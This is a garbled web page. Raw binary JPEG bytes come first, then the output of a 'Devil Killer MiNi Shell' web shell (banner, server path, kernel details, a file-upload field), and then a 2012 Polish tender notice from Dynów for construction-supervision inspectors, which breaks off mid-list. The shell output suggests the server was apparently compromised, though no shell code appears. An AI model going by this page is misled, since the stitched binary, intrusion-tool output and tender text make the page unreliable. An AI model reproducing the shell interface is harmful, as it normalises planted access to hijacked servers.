JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120620/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120620/211856-N-2012.html

<p class="kh_header"><b>Dynów: Usługa pełnienia  funkcji Inspektora Nadzoru Inwestorskiego nad realizacją  inwestycji pn.: Poprawa wizerunku miasta Dynów poprzez rewitalizację Rynku i przyległych ulic,parku przydworskiego oraz remont infrastruktury komunikacyjnej w obrębie Obszaru I</b><br>
<b>Numer ogłoszenia: 211856 - 2012; data zamieszczenia: 20.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Dynów , Rynek 2, 36-065 Dynów, woj. podkarpackie, tel. 016 6521093 w. 49, faks 016 6521093.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.dynow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa pełnienia  funkcji Inspektora Nadzoru Inwestorskiego nad realizacją  inwestycji pn.: Poprawa wizerunku miasta Dynów poprzez rewitalizację Rynku i przyległych ulic,parku przydworskiego oraz remont infrastruktury komunikacyjnej w obrębie Obszaru I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest usługa  polegająca na pełnieniu kompleksowego nadzoru inwestorskiego nad realizacją inwestycji pn.: Poprawa wizerunku miasta Dynów poprzez rewitalizację Rynku i przyległych ulic,parku przydworskiego oraz remont infrastruktury komunikacyjnej w obrębie Obszaru I.
 W skład inwestycji pn.: Poprawa wizerunku miasta Dynów poprzez rewitalizację Rynku i przyległych ulic,parku przydworskiego oraz remont infrastruktury komunikacyjnej w obrębie Obszaru I wchodzi:
1) rewitalizacja Rynku i przyległych ulic,
2) rewitalizacja Parku przydworskiego,

W zakresie rewitalizacji Rynku i przyległych ulic wchodzą następujące zadania:
 Zadanie nr 1- Remont płyty Rynku wraz z wykonaniem urządzeń małej architektury.
 Zadanie nr 2 - Budowa fontanny.
 Zadanie nr 3 - Budowa oświetlenia ulicznego.
 Zadanie nr 4 - Wykonanie urządzenia  zieleni,
 Zadanie nr 5 - Wykonanie monitoringu elektronicznego.
 Zadanie nr 6 - Remont dróg i chodników.
 Zadanie nr 7 - Remont i budowa parkingów.
 Zadanie nr 8 - Budowa kładki dla pieszych przez rzekę Dynówkę.
 Zadanie nr 9-  Remont i budowę kanalizacji deszczowej.
W zakresie rewitalizacji parku przydworskiego w Dynowie  wchodzą  następujące zadania:
 Zadanie nr 10- Roboty przygotowawcze - roboty w zakresie kształtowania terenów zielonych.
 Zadanie nr 11- Urządzenia terenów zielonych - roboty w zakresie kształtowania terenów zielonych.
 Zadanie nr 12- Instalowanie mebli ulicznych, mała architektura - montaż ławek, koszy, tablic
                         informacyjnych, wyposażenie placów zabaw.
Zadanie nr 13- Wykonanie zjazdów, dróg wewnętrznych,placów,ścieżek spacerowych- roboty w
                         zakresie budowy dróg.
Zadanie nr 14- Budowa boiska wielofunkcyjnego i kortu tenisowego- roboty budowlane w zakresie
                        budowy obiektów sportowych.
Zadanie nr 15- Budowa budynku techniczno- socjalnego- toalety publiczne.
Zadanie nr 16- Oświetlenie parku - instalowanie urządzeń oświetlenia drogowego.
     	      
                   Szczegółowy zakres realizacji inwestycji opisany jest w SIWZ oraz w załącznikach stanowiących   dokumentację postępowania związaną z prowadzonym przetargiem nieograniczonym na wyłonienie wykonawcy robót budowlanych nr ogłoszenia o zamówieniu  61654-2012 z dnia 29.02.2012 zamieszczonej na stronie internetowej Zamawiającego: www.bip.dynow.pl 
Zamówienie dotyczy grupy Inspektorów branżowych i obejmuje kontrolę wykonanych robót budowlanych z upoważnienia  Zamawiającego w sposób stały podczas prowadzonych robót budowlanych, a także kontrolę rozliczeń budowy pod względem ilościowym i finansowym.
Funkcję inspektora nadzoru inwestorskiego należy pełnić zgodnie z obowiązującymi przepisami,normami, na warunkach ustalonych w umowie oraz stosownie do wymagań wynikających  ze wspófinansowania zadania będącego przedmiotem nadzoru ze środków Regionalnego Programu Operacyjnego dla Województwa Podkarpackiego na lata 2007-2013.
Zakres inwestycji wymaga od Wykonawcy posiadania uprawnień i kadry posiadającej uprawnienia 
do nadzorowania;
1)  robót budowlanych w następujących branżach budowlanych:
- konstrukcyjno-budowlanej bez ograniczeń - który będzie pełnić funkcję Kierownika Zespołu Inspektora  Nadzoru,
- drogowej,
- instalacyjnej w zakresie sieci,instalacji wodociągowych i kanalizacyjnych,
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych ,
- mostowej;
 2) prac związanych z konserwacją i pielęgnacją zieleni , drzewostanu oraz konserwacji i restauracji
     parków zabytkowych i innej zorganizowanej zieleni zabytkowej.

Obowiązki Wykonawcy:

1.Zakres podstawowych obowiązków i praw inspektora nadzoru wynika z art.25 i 26 ustawy z dnia 
7 lipca 1994 roku. Prawo budowlane  ( t.j. Dz.U. z 2006 r., Nr 156, poz. 1118 z późn. zm.) oraz przepisów wykonawczych i obejmuje w szczególności:
1) reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności robót z
      dokumentacją techniczną,obowiązującymi przepisami i normami oraz zasadami wiedzy      technicznej,
  2) uzgadnianie z Zamawiającym wszelkich odstępstw i zmian technologi robót, materiałów i urządzeń, zgłaszanych przez Wykonawcę robót, szczególnie w sytuacjach, gdy zmiany te mogą skutkować rozszerzeniem zakresu rzeczowego określonego umową lub podwyższeniem kosztów realizacji robót,
  3) sprawdzanie jakości wykonanych robót budowlanych oraz prac związanych z konserwacją 
      i pielęgnacją zieleni , drzewostanu oraz konserwacji i restauracji parków zabytkowych oraz innej zorganizowanej zieleni zabytkowej, wbudowanych materiałów, posadzonych sadzonek roślin,
      a w szczególności zapobiegania zastosowania wyrobów, materiałów budowlanych oraz sadzonek roślin wadliwych i niedopuszczenie ich do obrotu i stosowania w budownictwie,
  4) sprawdzanie i odbiór robót budowlanych ulegających zakryciu i zanikających, uczestniczenie 
      w próbach rozruchu i odbiorach technicznych instalacji i urządzeń technicznych,
  5) przygotowanie i stwierdzenie gotowości do odbioru robót oraz udział w czynnościach odbioru robót,
  6) potwierdzenie ilości wykonanych robót,
  7) potwierdzenie usunięcia wad stwierdzonych przy odbiorze,
  8) sprawdzanie rozliczeń Wykonawcy robót budowlanych potwierdzenie należnych mu kwot oraz rozliczenie końcowe inwestycji,
  9) uczestniczenie w przeglądach gwarancyjnych okresu gwarancji,
10) inne niezbędne czynności konieczne do prawidłowego sprawowania nadzoru inwestorskiego.

  

 2. Obowiązki Wykonawcy na etapie poprzedzającym rozpoczęcie robót budowlanych:
    1) zapoznanie się, weryfikacja oraz sprawdzenie wzajemnej zgodności i kompletności dokumentacji projektowej, umowy z Wykonawcą robót budowlanych oraz Specyfikacji Technicznych Wykonania i Odbioru Robót,
    2) przeprowadzenia szczegółowej inspekcji terenu budowy w celu stwierdzenia zgodności istniejącego stanu z
        dokumentacją projektową,
      3) niezwłocznie po podpisaniu umowy -  opracowanie i przedstawienia do akceptacji Zamawiającego   schematu organizacyjnego Zespołu Inspektora Nadzoru wraz ze szczegółowym zakresem obowiązków 
         i uprawnień jakie zamierza przekazać poszczególnym inspektorom nadzoru wchodzącym w skład  Zespołu;

     3. Obowiązki Wykonawcy  na etapie prowadzenia robót budowlanych :
  1) nadzorowanie budowy w takich odstępach czasu aby zapewniona była skuteczność nadzoru ( minimum co  najmniej  raz  w tygodniu inspektor nadzoru pełniący funkcję kierownika  Zespołu Inspektora Nadzoru, pozostali inspektorzy nadzoru w zależności od rodzaju wykonywanych robót) oraz od potrzeb Zamawiającego i Wykonawcy robót,
   a) czas pracy Inspektora Nadzoru winien być dostosowany do czasu pracy Wykonawcy robót i Zamawiającego,
b) w razie pilnej konieczności podjęcia określonych decyzji w trakcie wykonywania robót Inspektor
    Nadzoru zobowiązany jest stawić się na budowie najpóźniej w ciągu 18 godzin od powzięcia informacji o
    zaistniałej  sytuacji,
   c) podczas każdorazowego pobytu na budowie Inspektor Nadzoru ma obowiązek dokonania bieżącego   przeglądu dziennika budowy i dokonania stosownego zapisu, potwierdzającego jednocześnie pobyt Inspektora Nadzoru na budowie,
  d) poszczególni inspektorzy nadzoru wchodzący w skład Zespołu Inspektora Nadzoru mają prawo
     dokonywania zapisów w dzienniku budowy wyłącznie w zakresie powierzonych im czynności   nadzoru,
      e) praca inspektorów nadzoru powinna być zorganizowana w sposób zapewniający terminowość    dokonywanych przez nich odbiorów robót i prób technicznych, eliminując możliwość powstawiania opóźnień w realizacji inwestycji,
    2) protokolarnego przekazania Wykonawcy robót terenu budowy, kontrolowania przestrzegania
        przez Wykonawcę robot zasad bezpieczeństwa pracy i utrzymania   porządku na terenie budowy,
    3) wstrzymania robót prowadzonych  w sposób zagrażający bezpieczeństwu, lub niezgodnie z warunkami  umowy
       o wykonanie robót budowlanych i niezwłocznego pisemnego powiadomienia Zleceniodawcy o tym fakcie,
   4) sprawowania nadzoru inwestorskiego przez uprawnionych przedstawicieli Inspektora Nadzoru- zgodnie
       z wymogami ustawy Prawo budowlane i warunkami pozwolenia na budowę, 
  5) reprezentowania Zleceniodawcy w kontaktach z osobami trzecimi w sprawach związanych z
         realizacją przedmiotu umowy,
   6) prowadzenia regularnych inspekcji na terenie budowy w celu sprawdzenia jakości wykonywanych robót oraz
       wbudowanych materiałów, zgodnie z wymaganiami specyfikacji technicznych,dokumentacji projektowej
      oraz wiedzą techniczną i praktyka inżynierską,
     7) zatwierdzania materiałów budowlanych i instalacyjnych, urządzeń i dostaw przewidywanych przez  Wykonawcę robót do wbudowania,żądania i kontroli dokumentów jakości, aprobat, deklaracji zgodności, atestów, instrukcji obsługi itp.,  
  8)odpowiednio wcześniejsze informowanie Zleceniodawcy o wszystkich zagrożeniach występujących  podczas   realizacji robót, które mogą mieć wpływ na wydłużenie czasu wykonania, pogorszenia jakości robót lub zwiększenie kosztów, oraz podejmowania działań zapobiegawczych i naprawczych,
 9)organizowania oraz przewodniczenia comiesięcznym naradom dotyczącym postępu robót (Rad Budowy) w   których udział biorą przedstawiciele wszystkich zaangażowanych w realizację zadania inwestycyjnego stron,w celu podejmowania bieżących decyzji, dotyczących wszystkich zagadnień  mających wpływ na postęp robót oraz sporządzania protokołów z tych narad i przekazywania ich Zleceniodawcy w terminie 5 dni od daty narady,
     10) organizowanie narad technicznych, oraz sporządzanie protokołów z tych narad i przekazywanie ich
        Zleceniodawcy oraz Wykonawcy robót w terminie 5 dni od dnia narady,
     11) monitorowania postępu robót pod względem technicznym,finansowym, organizacyjnym czasowym, poprzez sprawdzanie ich  rzeczywistego zaawansowania i zgodności realizacji z obowiązującym harmonogramem finansowo-rzeczowym, będącym załącznikiem do umowy zawartej z Wykonawcą robót, oraz kontrola    prawidłowości zafakturowania wykonanych robót,
  12) kontroli sposobu składowania i przechowywania materiałów,
       13)  nadzorowania badań wbudowanych materiałów i wyrobów (prefabrykatów) wykonywanych przez
            Wykonawcę robót,
    14) polecenia Wykonawcy robót wykonania dodatkowych badań materiałów lub robót budzących
          wątpliwości co do ich jakości, po uprzedniej akceptacji przez Zleceniodawcę,
    15) akceptowanie rysunków wykonawczych i warsztatowych sporządzonych przez Wykonawcę robót
          i ich archiwizowanie,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp, do wysokości 50 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony  jeżeli wykonawca oświadczy na formularzu stanowiącym załącznik nr 5
                 do  wzoru oferty, iż osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają wymagane
                 uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony  jeżeli wykonawca wykaże ,że: w okresie ostatnich 3 lat przed upływem terminu  składania  ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał  co najmniej jedną usługę nadzoru inwestorskiego w postaci nadzorowania robót  polegających na budowie, przebudowie, rozbudowie,  lub remoncie  o wartości robót minimum         6 000 000,00  zł PLN  netto. 
    
          
          Wykonawca spełni warunki określone w pkt 2.2. jeżeli przedstawi realizację jednego zadania,
                lub  przedstawi kilka zadań wykonanych osobno.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony  jeżeli wykonawca wykaże ,że dysponuje do realizacji zamówienia 
              następującymi osobami spełniającymi poniższe wymagania:
             a)inspektor nadzoru branży  budowlanej posiadający:
    -  uprawnienia budowlane do kierowania ( nadzorowania) robotami budowlanymi w
       specjalności   kostrukcyjno -  budowlanej bez ograniczeń lub odpowiadające im uprawnienia budowlane, w zakresie pełnionej funkcji, które zostały wydane na podstawie wcześniej obowiązujących przepisów w zakresie nadzorowania i kontrolowania budowy  i robót, kontrolowania wytwarzania konstrukcyjnych elementów  budowlanych oraz oceniania  i badania stanu technicznego w zakresie wszelkich budynków i
       innych budowli,
     -  co najmniej pięć lat doświadczenia  zawodowego, po dniu uzyskania ww. uprawnień
        budowlanych, w pełnieniu funkcji inspektora nadzoru lub kierownika budowy/ robót przy
        budowie, przebudowie, rozbudowie, modernizacji lub remoncie budynków;
b) inspektor nadzoru branży drogowej posiadający:
   - uprawnienia budowlane do kierowania (nadzorowania) robotami budowlanymi w specjalności   drogowej  lub odpowiadające im uprawnienia budowlane, w zakresie pełnionej funkcji, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
   - co najmniej pięć lat doświadczenia  zawodowego, po dniu uzyskania ww. uprawnień  budowlanych, w
    pełnieniu funkcji inspektora nadzoru lub kierownika budowy/ robót drogowych, 
   c ) inspektor nadzoru branży sanitarnej posiadający:
   -  uprawnienia budowlane do kierowania (nadzorowania) robotami budowlanymi w specjalności instalacyjnej w zakresie sieci,instalacji i urządzeń cieplnych,wentylacyjnych,gazowych, wodociągowych i kanalizacyjnych lub odpowiadające im uprawnienia budowlane, w zakresie pełnionej funkcji, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
 - co najmniej pięć lat doświadczenia  zawodowego, po dniu uzyskania ww. uprawnień  budowlanych, w pełnieniu funkcji inspektora nadzoru lub kierownika budowy/robót przy budowie sieci wodociągowych i kanalizacyjnych.
 d)  inspektor nadzoru branży elektrycznej posiadający:
  -  uprawnienia budowlane do kierowania (nadzorowania) robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i energetycznych, lub odpowiadające im uprawnienia budowlane, w zakresie pełnionej funkcji, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
   -  co najmniej pięć lat doświadczenia  zawodowego, po dniu uzyskania ww. uprawnień  budowlanych, w   pełnieniu funkcji inspektora nadzoru robót lub kierownika budowy/robót przy budowie sieci elektrycznych.
 e) inspektor nadzoru branży mostowej posiadający:
 -  uprawnienia budowlane do kierowania (nadzorowania) robotami budowlanymi w specjalności mostowej
         lub odpowiadające im uprawnienia budowlane, w zakresie pełnionej funkcji, które zostały wydane na
         podstawie wcześniej obowiązujących przepisów,
     -  co najmniej pięć lat doświadczenia  zawodowego, po dniu uzyskania ww. uprawnień  budowlanych, w   pełnieniu funkcji inspektora nadzoru robót lub kierownika budowy/robót przy budowie mostów,
    f) osobę posiadającą:
      - tytuł  zawodowy magistra, doświadczenie zawodowe w nadzorowaniu prac w branży zieleni, przy
        konserwacji, pielęgnacji zieleni i drzewostanu  oraz  doświadczenie zawodowe w   nadzorowaniu prac
        konserwatorskich lub restauratorskich parków zabytkowych i innej zorganizowanej zieleni
        zabytkowej,
  -  co najmniej trzy lata doświadczenia zawodowego, po dniu uzyskania tytułu magistra, w nadzorowaniu  prac w branży zieleni przy konserwacji, pielęgnacji zieleni i drzewostanu  oraz  prac  konserwatorskich lub restauratorskich parków zabytkowych i innej zorganizowanej zieleni zabytkowej,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca     zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) zmian nie dotyczących treści oferty, na podstawie której dokonano wyboru ,
     2) zmiany terminu wykonania przedmiotu umowy w następujących wypadkach:
        a) jeżeli opóźnieniu ulegnie wykonanie robót budowlanych niezbędnych do realizacji
         zamówienia - termin realizacji będzie przesunięty przesunięty o czas niezbędny do
         wykonania  opóźnionych prac,
         b) ze względu na przedłużającą się procedurę wyboru najkorzystniejszej oferty, spowodowanej
                    odwołaniem złożonym przez Wykonawców do Prezesa KIO, Zmiana terminu wykonania
                    umowy nastąpi o okres równy okresowi trwającej przeszkody,
